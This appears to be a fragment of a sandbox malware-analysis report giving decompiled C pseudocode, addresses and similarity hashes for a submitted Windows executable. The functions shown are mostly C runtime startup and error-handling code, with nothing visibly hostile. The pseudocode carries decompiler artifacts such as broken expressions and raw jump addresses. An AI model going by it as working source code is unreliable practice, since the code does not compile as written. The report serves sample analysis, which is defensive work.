                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t79);
                                                                                                                                                                                                                                                        				 *_t79 = 0x84;
                                                                                                                                                                                                                                                        				goto 0xe5ac48f6;
                                                                                                                                                                                                                                                        				_t25 = _t89 - 2; // -2
                                                                                                                                                                                                                                                        				if (_t25 - r15d <= 0) goto 0xe5ac4909;
                                                                                                                                                                                                                                                        				if (_t60 != 0) goto 0xe5ac48fa;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t79);
                                                                                                                                                                                                                                                        				 *_t79 = 9;
                                                                                                                                                                                                                                                        				goto 0xe5ac4959;
                                                                                                                                                                                                                                                        				_t61 = GetLastError();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC43B8(_t61, _t79, _t89);
                                                                                                                                                                                                                                                        				goto 0xe5ac48f6;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 8)) = r15w;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 0x10)) = r14d;
                                                                                                                                                                                                                                                        				 *__r9 = r14d;
                                                                                                                                                                                                                                                        				_t55 =  ==  ? 0x2000 : 0x1000;
                                                                                                                                                                                                                                                        				 *((short*)(__r9 + 6)) =  ==  ? 0x2000 : 0x1000;
                                                                                                                                                                                                                                                        				if (_t61 == 2) goto 0xe5ac4956;
                                                                                                                                                                                                                                                        				_v128 = _v128 & 0x00000000;
                                                                                                                                                                                                                                                        				_v136 =  &_v120;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				if (PeekNamedPipe(??, ??, ??, ??, ??, ??) == 0) goto 0xe5ac4956;
                                                                                                                                                                                                                                                        				 *(__r9 + 0x14) = _v120;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(r15b, _v120, _v56 ^ _t102 - 0x00000080);
                                                                                                                                                                                                                                                        			}


























                                                                                                                                                                                                                                                        0x7ff6e5ac47d4
                                                                                                                                                                                                                                                        0x7ff6e5ac47ea
                                                                                                                                                                                                                                                        0x7ff6e5ac47f1
                                                                                                                                                                                                                                                        0x7ff6e5ac47f4
                                                                                                                                                                                                                                                        0x7ff6e5ac4804
                                                                                                                                                                                                                                                        0x7ff6e5ac4807
                                                                                                                                                                                                                                                        0x7ff6e5ac480f
                                                                                                                                                                                                                                                        0x7ff6e5ac4815
                                                                                                                                                                                                                                                        0x7ff6e5ac481c
                                                                                                                                                                                                                                                        0x7ff6e5ac4822
                                                                                                                                                                                                                                                        0x7ff6e5ac482a
                                                                                                                                                                                                                                                        0x7ff6e5ac482c
                                                                                                                                                                                                                                                        0x7ff6e5ac483e
                                                                                                                                                                                                                                                        0x7ff6e5ac4847
                                                                                                                                                                                                                                                        0x7ff6e5ac4849
                                                                                                                                                                                                                                                        0x7ff6e5ac484c
                                                                                                                                                                                                                                                        0x7ff6e5ac484e
                                                                                                                                                                                                                                                        0x7ff6e5ac485a
                                                                                                                                                                                                                                                        0x7ff6e5ac485e
                                                                                                                                                                                                                                                        0x7ff6e5ac4861
                                                                                                                                                                                                                                                        0x7ff6e5ac4865
                                                                                                                                                                                                                                                        0x7ff6e5ac4869
                                                                                                                                                                                                                                                        0x7ff6e5ac4871
                                                                                                                                                                                                                                                        0x7ff6e5ac4877
                                                                                                                                                                                                                                                        0x7ff6e5ac487a
                                                                                                                                                                                                                                                        0x7ff6e5ac4888
                                                                                                                                                                                                                                                        0x7ff6e5ac488c
                                                                                                                                                                                                                                                        0x7ff6e5ac4898
                                                                                                                                                                                                                                                        0x7ff6e5ac489c
                                                                                                                                                                                                                                                        0x7ff6e5ac48a5
                                                                                                                                                                                                                                                        0x7ff6e5ac48a9
                                                                                                                                                                                                                                                        0x7ff6e5ac48ad
                                                                                                                                                                                                                                                        0x7ff6e5ac48b2
                                                                                                                                                                                                                                                        0x7ff6e5ac48b6
                                                                                                                                                                                                                                                        0x7ff6e5ac48be
                                                                                                                                                                                                                                                        0x7ff6e5ac48c0
                                                                                                                                                                                                                                                        0x7ff6e5ac48c8
                                                                                                                                                                                                                                                        0x7ff6e5ac48ca
                                                                                                                                                                                                                                                        0x7ff6e5ac48cd
                                                                                                                                                                                                                                                        0x7ff6e5ac48d2
                                                                                                                                                                                                                                                        0x7ff6e5ac48d7
                                                                                                                                                                                                                                                        0x7ff6e5ac48dd
                                                                                                                                                                                                                                                        0x7ff6e5ac48df
                                                                                                                                                                                                                                                        0x7ff6e5ac48e5
                                                                                                                                                                                                                                                        0x7ff6e5ac48e9
                                                                                                                                                                                                                                                        0x7ff6e5ac48eb
                                                                                                                                                                                                                                                        0x7ff6e5ac48f0
                                                                                                                                                                                                                                                        0x7ff6e5ac48f8
                                                                                                                                                                                                                                                        0x7ff6e5ac4900
                                                                                                                                                                                                                                                        0x7ff6e5ac4902
                                                                                                                                                                                                                                                        0x7ff6e5ac4907
                                                                                                                                                                                                                                                        0x7ff6e5ac490c
                                                                                                                                                                                                                                                        0x7ff6e5ac4916
                                                                                                                                                                                                                                                        0x7ff6e5ac491f
                                                                                                                                                                                                                                                        0x7ff6e5ac4922
                                                                                                                                                                                                                                                        0x7ff6e5ac4926
                                                                                                                                                                                                                                                        0x7ff6e5ac492a
                                                                                                                                                                                                                                                        0x7ff6e5ac492c
                                                                                                                                                                                                                                                        0x7ff6e5ac4936
                                                                                                                                                                                                                                                        0x7ff6e5ac493b
                                                                                                                                                                                                                                                        0x7ff6e5ac4941
                                                                                                                                                                                                                                                        0x7ff6e5ac494e
                                                                                                                                                                                                                                                        0x7ff6e5ac4953
                                                                                                                                                                                                                                                        0x7ff6e5ac497b

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        • Opcode ID: f87ea3bbe7c2e313c368058487d51ea83fea4ee4f0ca65080127e754b7215b2d
                                                                                                                                                                                                                                                        • Instruction ID: 162bee5548fa869d155191841d9f3df00cdf0d14a46cb372b4cc13f19e76afa1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f87ea3bbe7c2e313c368058487d51ea83fea4ee4f0ca65080127e754b7215b2d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D516D23F086428AFB10DF69D4603BD37A1AF48B59F118138DE0DDB689DF39D881870A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABB19C(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
                                                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        				signed short _t20;
                                                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t56 = __rbx;
                                                                                                                                                                                                                                                        				_t54 = __rax;
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_t8 = E00007FF67FF6E5ABB36C(1); // executed
                                                                                                                                                                                                                                                        				if (_t8 == 0) goto 0xe5abb2e8;
                                                                                                                                                                                                                                                        				dil = 0;
                                                                                                                                                                                                                                                        				_v24 = dil;
                                                                                                                                                                                                                                                        				_t9 = E00007FF67FF6E5ABB330();
                                                                                                                                                                                                                                                        				_t35 =  *0xe5afc570; // 0x2
                                                                                                                                                                                                                                                        				if (_t35 == 1) goto 0xe5abb2f3;
                                                                                                                                                                                                                                                        				if (_t35 != 0) goto 0xe5abb224;
                                                                                                                                                                                                                                                        				 *0xe5afc570 = 1;
                                                                                                                                                                                                                                                        				_t10 = E00007FF67FF6E5AC8674(__rbx, 0xe5ada468, 0xe5ada4a8); // executed
                                                                                                                                                                                                                                                        				if (_t10 == 0) goto 0xe5abb205;
                                                                                                                                                                                                                                                        				goto 0xe5abb2dd;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8630(_t56, 0xe5ada450, 0xe5ada460); // executed
                                                                                                                                                                                                                                                        				 *0xe5afc570 = 2;
                                                                                                                                                                                                                                                        				goto 0xe5abb22c;
                                                                                                                                                                                                                                                        				dil = 1;
                                                                                                                                                                                                                                                        				_v24 = dil;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB684(E00007FF67FF6E5ABB4DC(_t9, 0xe5ada460));
                                                                                                                                                                                                                                                        				if ( *_t54 == 0) goto 0xe5abb25f;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB444(_t54, _t54) == 0) goto 0xe5abb25f;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_t55 =  *_t54;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB68C( *0xe5ada428());
                                                                                                                                                                                                                                                        				if ( *_t55 == 0) goto 0xe5abb281;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB444(_t55, _t55) == 0) goto 0xe5abb281;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8984( *_t55);
                                                                                                                                                                                                                                                        				_t20 = E00007FF67FF6E5ABB7E8(0xe5ada460);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC85DC();
                                                                                                                                                                                                                                                        				r9d = _t20 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t72 = _t55;
                                                                                                                                                                                                                                                        				_t22 = E00007FF67FF6E5AB1000(_t55); // executed
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB82C(_t55) == 0) goto 0xe5abb2fd;
                                                                                                                                                                                                                                                        				if (dil != 0) goto 0xe5abb2b7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8968(0x7ff6e5ab0000, 0xe5ada460, _t55);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB500(1, 0);
                                                                                                                                                                                                                                                        				_t26 = _t22;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB82C(_t55) == 0) goto 0xe5abb305;
                                                                                                                                                                                                                                                        				if (_v24 != 0) goto 0xe5abb2db;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8958(0x7ff6e5ab0000, 0xe5ada460, _t72);
                                                                                                                                                                                                                                                        				return _t26;
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5abb19c
                                                                                                                                                                                                                                                        0x7ff6e5abb19c
                                                                                                                                                                                                                                                        0x7ff6e5abb19c
                                                                                                                                                                                                                                                        0x7ff6e5abb1ab
                                                                                                                                                                                                                                                        0x7ff6e5abb1b2
                                                                                                                                                                                                                                                        0x7ff6e5abb1b8
                                                                                                                                                                                                                                                        0x7ff6e5abb1bb
                                                                                                                                                                                                                                                        0x7ff6e5abb1c0
                                                                                                                                                                                                                                                        0x7ff6e5abb1c7
                                                                                                                                                                                                                                                        0x7ff6e5abb1d0
                                                                                                                                                                                                                                                        0x7ff6e5abb1d8
                                                                                                                                                                                                                                                        0x7ff6e5abb1da
                                                                                                                                                                                                                                                        0x7ff6e5abb1f2
                                                                                                                                                                                                                                                        0x7ff6e5abb1f9
                                                                                                                                                                                                                                                        0x7ff6e5abb200
                                                                                                                                                                                                                                                        0x7ff6e5abb213
                                                                                                                                                                                                                                                        0x7ff6e5abb218
                                                                                                                                                                                                                                                        0x7ff6e5abb222
                                                                                                                                                                                                                                                        0x7ff6e5abb224
                                                                                                                                                                                                                                                        0x7ff6e5abb227
                                                                                                                                                                                                                                                        0x7ff6e5abb233
                                                                                                                                                                                                                                                        0x7ff6e5abb23f
                                                                                                                                                                                                                                                        0x7ff6e5abb24b
                                                                                                                                                                                                                                                        0x7ff6e5abb24d
                                                                                                                                                                                                                                                        0x7ff6e5abb256
                                                                                                                                                                                                                                                        0x7ff6e5abb25f
                                                                                                                                                                                                                                                        0x7ff6e5abb26b
                                                                                                                                                                                                                                                        0x7ff6e5abb277
                                                                                                                                                                                                                                                        0x7ff6e5abb27c
                                                                                                                                                                                                                                                        0x7ff6e5abb281
                                                                                                                                                                                                                                                        0x7ff6e5abb289
                                                                                                                                                                                                                                                        0x7ff6e5abb28e
                                                                                                                                                                                                                                                        0x7ff6e5abb291
                                                                                                                                                                                                                                                        0x7ff6e5abb29d
                                                                                                                                                                                                                                                        0x7ff6e5abb2ab
                                                                                                                                                                                                                                                        0x7ff6e5abb2b0
                                                                                                                                                                                                                                                        0x7ff6e5abb2b2
                                                                                                                                                                                                                                                        0x7ff6e5abb2bb
                                                                                                                                                                                                                                                        0x7ff6e5abb2c0
                                                                                                                                                                                                                                                        0x7ff6e5abb2cd
                                                                                                                                                                                                                                                        0x7ff6e5abb2d4
                                                                                                                                                                                                                                                        0x7ff6e5abb2d6
                                                                                                                                                                                                                                                        0x7ff6e5abb2e7

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                                                                                                        • Opcode ID: 82626cce4205bd73421a457da6d28986ff7d371706ecb8d3ea81cf02a58e967d
                                                                                                                                                                                                                                                        • Instruction ID: c891c9ae024f8d897ceb465d38789e4a98975f8bc4d4a0801888a26f0159c518
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82626cce4205bd73421a457da6d28986ff7d371706ecb8d3ea81cf02a58e967d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D313723F0C10F46FA94BB6D94353B92281AF51B84F450034DA4ECB2DBDE6EAC05879B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                                                                                                                                                                                                                        • Instruction ID: f3e2bf64bf2a709658474146f133d82a6ace4eb6ba0b66fe1d2c62ab7ff11f52
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9241C423F1878283F7149B24D52037962A0FF95B65F109338EA5CCBAD5DF6DA9E08709
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC8888() {
                                                                                                                                                                                                                                                        				void* _t1;
                                                                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t1 = E00007FF67FF6E5AC88BC(); // executed
                                                                                                                                                                                                                                                        				if (_t1 == 0) goto 0xe5ac88aa;
                                                                                                                                                                                                                                                        				GetCurrentProcess();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC88E0(TerminateProcess(??, ??), _t6, _t11);
                                                                                                                                                                                                                                                        				ExitProcess(??);
                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                        0x7ff6e5ac8890
                                                                                                                                                                                                                                                        0x7ff6e5ac8897
                                                                                                                                                                                                                                                        0x7ff6e5ac8899
                                                                                                                                                                                                                                                        0x7ff6e5ac88ac
                                                                                                                                                                                                                                                        0x7ff6e5ac88b3

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: d426427e4f48dbbb9dc5f253e5f2c69f0b75b8518679dacd75070a6bbb583433
                                                                                                                                                                                                                                                        • Instruction ID: 9607b303b685bd7e801c17ed7ec63c189082c97d2ada132950538b37423741b9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d426427e4f48dbbb9dc5f253e5f2c69f0b75b8518679dacd75070a6bbb583433
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49D06726B1860342EB147F785C6527916526F48F85F511438DC0ACA797CE2EAC49474A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABF39C(intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long __r9, long long _a8, long long _a32, void* _a40) {
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a32 = __r9;
                                                                                                                                                                                                                                                        				if (__r8 == 0) goto 0xe5abf3e5;
                                                                                                                                                                                                                                                        				if (__r9 == 0) goto 0xe5abf3e5;
                                                                                                                                                                                                                                                        				if (__rcx != 0) goto 0xe5abf3fc;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                        0x7ff6e5abf39c
                                                                                                                                                                                                                                                        0x7ff6e5abf3a1
                                                                                                                                                                                                                                                        0x7ff6e5abf3c9
                                                                                                                                                                                                                                                        0x7ff6e5abf3ce
                                                                                                                                                                                                                                                        0x7ff6e5abf3d3
                                                                                                                                                                                                                                                        0x7ff6e5abf3d5
                                                                                                                                                                                                                                                        0x7ff6e5abf3da
                                                                                                                                                                                                                                                        0x7ff6e5abf3e0
                                                                                                                                                                                                                                                        0x7ff6e5abf3fb

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                                                                                                                                                                                                                        • Instruction ID: e26e784fba2821d9655448425542df094770e2cf5379d3a4a1e629bc272017d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51FA63B0924A46EBA8AE2D94207766180AF44FA4F184734DE6DC77CDCF3EDD01864B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABB0B0(intOrPtr* __rax) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t32 = __rax;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC7BD4(_t2, 2);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC579C(E00007FF67FF6E5ABB634(), __rax, _t34);
                                                                                                                                                                                                                                                        				_t6 = E00007FF67FF6E5AB53E0();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8B20(_t6);
                                                                                                                                                                                                                                                        				 *_t32 = _t6;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB3B8(1, _t32) == 0) goto 0xe5abb15b;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB8EC(_t33);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB568(E00007FF67FF6E5ABB3B8(1, _t32), _t32);
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC7E6C(E00007FF67FF6E5ABB62C(), _t32, _t33, E00007FF67FF6E5ABB930, _t37) != 0) goto 0xe5abb15b;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABB63C();
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB678() == 0) goto 0xe5abb123;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB3270(E00007FF67FF6E5AB3270(E00007FF67FF6E5AC7C40(_t13, 0x7ff6e5ab53e0)));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC8A80(E00007FF67FF6E5AB53E0(), _t32, 0x7ff6e5ab53e0);
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ABB650() == 0) goto 0xe5abb147; // executed
                                                                                                                                                                                                                                                        				0xe5ac85d4(); // executed
                                                                                                                                                                                                                                                        				_t20 = E00007FF67FF6E5AB53E0();
                                                                                                                                                                                                                                                        				0xe5abb824();
                                                                                                                                                                                                                                                        				if (_t20 != 0) goto 0xe5abb15b;
                                                                                                                                                                                                                                                        				return _t20;
                                                                                                                                                                                                                                                        			}











                                                                                                                                                                                                                                                        0x7ff6e5abb0b0
                                                                                                                                                                                                                                                        0x7ff6e5abb0bb
                                                                                                                                                                                                                                                        0x7ff6e5abb0c7
                                                                                                                                                                                                                                                        0x7ff6e5abb0cc
                                                                                                                                                                                                                                                        0x7ff6e5abb0d3
                                                                                                                                                                                                                                                        0x7ff6e5abb0dd
                                                                                                                                                                                                                                                        0x7ff6e5abb0e6
                                                                                                                                                                                                                                                        0x7ff6e5abb0e8
                                                                                                                                                                                                                                                        0x7ff6e5abb0f4
                                                                                                                                                                                                                                                        0x7ff6e5abb107
                                                                                                                                                                                                                                                        0x7ff6e5abb109
